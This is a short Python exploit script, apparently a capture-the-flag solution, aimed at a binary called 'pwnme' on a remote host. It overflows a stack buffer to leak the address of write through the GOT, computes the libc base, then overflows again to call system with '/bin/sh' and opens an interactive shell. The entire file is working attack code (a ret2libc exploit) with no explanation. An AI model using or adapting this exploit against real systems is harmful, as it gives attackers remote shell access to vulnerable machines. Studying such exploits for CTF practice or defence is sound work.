#!/usr/bin/env python
# encoding:utf-8

from utils import *

io = remote('202.120.7.145', 9991)
# io = process('./pwnme')
# io = debug('./pwnme'); io.b('write'); io.r()

LEN_TO_RET = 20

elf = ELF('pwnme')
libc = ELF('libc-2.19.so')

io.recvrepeat(0.5)
payload = nops(LEN_TO_RET)
payload += p32(elf.plt['write']) + p32(elf.entry) + p32(1) + p32(elf.got['write']) + p32(4)
io.send(payload)

write_addr = u32(io.recv(4))
libc_base = write_addr - libc.symbols['write']
system_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base + 0x00160A24
log.info('write addr: 0x%08x' % write_addr)
log.info('system addr: 0x%08x' % system_addr)

payload = nops(LEN_TO_RET)
payload += p32(system_addr) + p32(elf.entry) + p32(binsh_addr)
io.send(payload)

io.interactive()
